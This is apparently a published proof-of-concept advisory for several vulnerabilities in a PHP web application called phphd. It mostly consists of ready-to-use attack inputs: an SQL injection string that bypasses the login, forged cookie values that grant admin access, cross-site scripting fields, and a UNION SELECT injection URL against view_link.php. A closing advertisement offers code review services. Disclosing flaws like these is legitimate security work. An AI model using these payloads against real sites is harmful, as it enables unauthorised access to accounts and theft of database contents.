PoC/Exploit for Multiple Vulnerabilities in phphd

Published Proof of Concept code - Multiple Vulnerabilities in phphd.

Description
Available
Solution
Available

1. Authentication Bypass

a) SQL Injection
url: http://host/ht/login.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1
Cookie: email=aaa@aaa.com


2. Cross-Site Scripting Example.
Url: http://host/phphd/add.php
Download_name: <XSS>
Version: <XSS>
Download Description: <XSS>


3. SQL Injection Example:
http://host/phphd/view_link.php?file_id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

Order Source Code Review made by eVuln

Protect against hacking by source code analysis of your website done by eVuln team.The work will be done by specialists in web application security.

Advisories by vuln type